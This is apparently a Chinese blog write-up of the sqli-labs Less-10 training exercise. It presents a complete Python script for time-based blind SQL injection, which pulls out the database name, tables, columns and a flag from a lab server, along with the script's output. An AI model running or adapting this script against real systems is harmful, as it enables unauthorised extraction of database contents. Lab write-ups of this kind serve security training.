less-10 in sqli-labs
阿新 • • 發佈:2020-12-17
Less-10 延遲注入[ ” ]
先進行注入點的測試,發現試過很多回顯都是一樣的,當嘗試到?id=1" and sleep(5) --+,發現頁面在遲緩後有回顯,猜測是基於"的時間盲注,盲註腳本和less-9基本一樣,改下url就行。
解題指令碼
# less-9 url = "http://sqli-labs:8080/Less-9/?id=1' " # less-10 url = "http://sqli-labs:8080/Less-9/?id=1" " import requests import time import datetime MAXLENGTH = 20 url = "http://sqli-labs:8080/Less-10/?id=1\" " def getLengthOfDatabase(): for num in range(1,MAXLENGTH): payload = "and if(length(database())=%s,sleep(2),1) --+" first_time = datetime.datetime.now() # 獲得payload提交前的時間 res = requests.get(url + payload % num) second_time = datetime.datetime.now() # 獲得payload提交後的時間 diference_time = (second_time - first_time).seconds # 時間差 if diference_time > 1: print("[+] 資料庫的長度為 => {}".format(num)) return num def getNameOfDatabase(DATABASELENGTH): database_name = "" for i in range(1,DATABASELENGTH+1): for j in range(32,127): payload = "and if(ascii(substr(database(),%s,1))=%s,sleep(2),1) --+" first_time = datetime.datetime.now() res = requests.get(url + payload % (i,j)) second_time = datetime.datetime.now() difference_time = (second_time - first_time).seconds if difference_time > 1: database_name += chr(j) print("[+] 資料庫名為 => " + database_name) return database_name def getNumberOfTables(): for num in range(1,MAXLENGTH): payload = "and if((select count(*) from information_schema.tables where table_schema=database())=%s,sleep(2),1) --+" first_time = datetime.datetime.now() res = requests.get(url + payload % num) second_time = datetime.datetime.now() difference_time = (second_time - first_time).seconds if difference_time > 1: print("[+] 資料庫中表的數量為 => {}".format(num)) return num def getLengthOfAllTables(NUMBEROFTABLES): lengthofalltables_list = [] for i in range(NUMBEROFTABLES): for num in range(1,MAXLENGTH): payload = "and if(length((select table_name from information_schema.tables where table_schema=database() limit %s,1))=%s,sleep(2),1) --+" first_time = datetime.datetime.now() res = requests.get(url + payload % (i,num)) second_time = datetime.datetime.now() difference_time = (second_time - first_time).seconds if difference_time > 1: print("[+] 第{}張表的長度為 => {}".format(i,num)) lengthofalltables_list.append(num) print("[+] 所有表的長度為 => {}".format(lengthofalltables_list)) return lengthofalltables_list def getNameOfAllTables(NUMBEROFTABLES,LENGTHOFTABLE_LIST): nameofalltables_list = [] for i in range(NUMBEROFTABLES): name = "" for j in range(1,LENGTHOFTABLE_LIST[i]+1): for k in range(32,127): payload = "and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %s,1),%s,1))=%s,sleep(2),1) --+" first_time = datetime.datetime.now() res = requests.get(url + payload % (i,j,k)) second_time = datetime.datetime.now() difference_time = (second_time - first_time).seconds if difference_time > 1: name = name + chr(k) break nameofalltables_list.append(name) print("[+] 第{}張表的名字為 => {}".format(i+1,name)) print("[+] 所有表的名字為 => {}".format(nameofalltables_list)) return nameofalltables_list def getNumberOfColumns(TABLE_TO_FIND): for num in range(1,MAXLENGTH): payload = "and if((select count(*) from information_schema.columns where table_name='%s')=%s,sleep(2),1) --+" first_time = datetime.datetime.now() res = requests.get(url + payload % (TABLE_TO_FIND,num)) second_time = datetime.datetime.now() difference_time = (second_time - first_time).seconds if difference_time > 1: print("[+] {}表中列的數量為 => {}".format(TABLE_TO_FIND,num)) return num def getLengthOfAllColmuns(NUMBEROFCOLUMNS,TABLE_TO_FIND): lengthofallcolumns_list = [] for i in range(NUMBEROFCOLUMNS): for num in range(1,MAXLENGTH): payload = "and if(length((select column_name from information_schema.columns where table_schema=database() and table_name='%s' limit %s,1))=%s,sleep(2),1) --+" first_time = datetime.datetime.now() res = requests.get(url + payload % (TABLE_TO_FIND,i,num)) second_time = datetime.datetime.now() difference_time = (second_time - first_time).seconds if difference_time > 1: lengthofallcolumns_list.append(num) print("[+] {}表中列的長度分別為 => {}".format(TABLE_TO_FIND,lengthofallcolumns_list)) return lengthofallcolumns_list def getNameOfAllColumns(NUMBEROFTABLES,LENGTHOFCOLUMNS_LIST,TABLE_TO_FIND): nameofallcolumns_list = [] for i in range(NUMBEROFCOLUMNS): name = "" for j in range(1,LENGTHOFCOLUMNS_LIST[i]+1): for k in range(32,127): payload = "and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='%s' limit %s,1),%s,1))=%s,sleep(2),1) --+" first_time = datetime.datetime.now() res = requests.get(url + payload % (TABLE_TO_FIND,i,j,k)) second_time = datetime.datetime.now() difference_time = (second_time - first_time).seconds if difference_time > 1: name = name + chr(k) break nameofallcolumns_list.append(name) print("[+] {}表中列名分別為 => {}".format(TABLE_TO_FIND,nameofallcolumns_list)) return nameofallcolumns_list def getData(TABLE_TO_FIND,COLUMN_TO_FIND): # 初始化flag的長度為1 flag_length = 1 flag = "" # 從1開始無限迴圈flag的長度直到找出 while True: # flag中每一個字元的所有可能取值 for k in range(32,127): payload = "and if(ascii(substr((select %s from %s),%s,1))=%s,sleep(2),1) --+" first_time = datetime.datetime.now() res = requests.get(url + payload % (COLUMN_TO_FIND,TABLE_TO_FIND,flag_length,k)) second_time = datetime.datetime.now() difference_time = (second_time - first_time).seconds if difference_time > 1: # 顯示flag flag += chr(k) print("[+] " + flag) # flag終止條件,即flag的尾端右花括號 if chr(k) == "}": print() return 1 break # 如果沒有匹配成功,flag長度加1,繼續迴圈 flag_length += 1 if __name__ == '__main__': print("Judging the length of the database...") DATABASELENGTH = getLengthOfDatabase() print("Judging the name of the database...") DATABASENAME = getNameOfDatabase(DATABASELENGTH) print("Judging the number of tables in the {}...".format(DATABASENAME)) NUMBEROFTABLES = getNumberOfTables() print("Judging the length of every table in the {}...".format(DATABASENAME)) LENGTHOFTABLE_LIST = getLengthOfAllTables(NUMBEROFTABLES) print("Judging the name of every table in the {}...".format(DATABASENAME)) NAMEOFTABLE_LIST = getNameOfAllTables(NUMBEROFTABLES,LENGTHOFTABLE_LIST) for i in NAMEOFTABLE_LIST: print("[+]{}".format(i)) TABLE_TO_FIND = input("Select the table name:") if TABLE_TO_FIND not in NAMEOFTABLE_LIST: print("Error!") exit() print() NUMBEROFCOLUMNS = getNumberOfColumns(TABLE_TO_FIND) print("Judging the number of columns in the {}...".format(TABLE_TO_FIND)) print("Judging the length of every column in the {}...".format(TABLE_TO_FIND)) LENGTHOFCOLUMNS_LIST = getLengthOfAllColmuns(NUMBEROFCOLUMNS,TABLE_TO_FIND) print("Judging the name of every column in the {}...".format(TABLE_TO_FIND)) NAMEOFCOLUMNS_LIST = getNameOfAllColumns(NUMBEROFTABLES,LENGTHOFCOLUMNS_LIST,TABLE_TO_FIND) for i in NAMEOFCOLUMNS_LIST: print("[+]{}".format(i)) COLUMN_TO_FIND = input("Select the column name:") if TABLE_TO_FIND not in NAMEOFTABLE_LIST: print("Error!") exit() print("Judging the data...") print("[+] The flag is...") getData(TABLE_TO_FIND,COLUMN_TO_FIND)
輸出
D:\Pycharm\3.9\Scripts\python.exe D:/Pycharm/3.9/SQL注入/time-blind.py Judging the length of the database... [+] 資料庫的長度為 => 8 Judging the name of the database... [+] 資料庫名為 => s [+] 資料庫名為 => se [+] 資料庫名為 => sec [+] 資料庫名為 => secu [+] 資料庫名為 => secur [+] 資料庫名為 => securi [+] 資料庫名為 => securit [+] 資料庫名為 => security Judging the number of tables in the security... [+] 資料庫中表的數量為 => 5 Judging the length of every table in the security... [+] 第0張表的長度為 => 6 [+] 第1張表的長度為 => 10 [+] 第2張表的長度為 => 8 [+] 第3張表的長度為 => 7 [+] 第4張表的長度為 => 5 [+] 所有表的長度為 => [6, 10, 8, 7, 5] Judging the name of every table in the security... [+] 第1張表的名字為 => emails [+] 第2張表的名字為 => hermesflag [+] 第3張表的名字為 => referers [+] 第4張表的名字為 => uagents [+] 第5張表的名字為 => users [+] 所有表的名字為 => ['emails', 'hermesflag', 'referers', 'uagents', 'users'] [+]emails [+]hermesflag [+]referers [+]uagents [+]users Select the table name:hermesflag [+] hermesflag表中列的數量為 => 2 Judging the number of columns in the hermesflag... Judging the length of every column in the hermesflag... [+] hermesflag表中列的長度分別為 => [2, 4] Judging the name of every column in the hermesflag... [+] hermesflag表中列名分別為 => ['Id', 'flag'] [+]Id [+]flag Select the column name:flag Judging the data... [+] The flag is... [+] f [+] fl [+] fla [+] flag [+] flag{ [+] flag{3 [+] flag{32 [+] flag{327 [+] flag{327a [+] flag{327a6 [+] flag{327a6c [+] flag{327a6c4 [+] flag{327a6c43 [+] flag{327a6c430 [+] flag{327a6c4304 [+] flag{327a6c4304a [+] flag{327a6c4304ad [+] flag{327a6c4304ad5 [+] flag{327a6c4304ad59 [+] flag{327a6c4304ad593 [+] flag{327a6c4304ad5938 [+] flag{327a6c4304ad5938e [+] flag{327a6c4304ad5938ea [+] flag{327a6c4304ad5938eaf [+] flag{327a6c4304ad5938eaf0 [+] flag{327a6c4304ad5938eaf0e [+] flag{327a6c4304ad5938eaf0ef [+] flag{327a6c4304ad5938eaf0efb [+] flag{327a6c4304ad5938eaf0efb6 [+] flag{327a6c4304ad5938eaf0efb6c [+] flag{327a6c4304ad5938eaf0efb6cc [+] flag{327a6c4304ad5938eaf0efb6cc3 [+] flag{327a6c4304ad5938eaf0efb6cc3e [+] flag{327a6c4304ad5938eaf0efb6cc3e5 [+] flag{327a6c4304ad5938eaf0efb6cc3e53 [+] flag{327a6c4304ad5938eaf0efb6cc3e53d [+] flag{327a6c4304ad5938eaf0efb6cc3e53dc [+] flag{327a6c4304ad5938eaf0efb6cc3e53dc}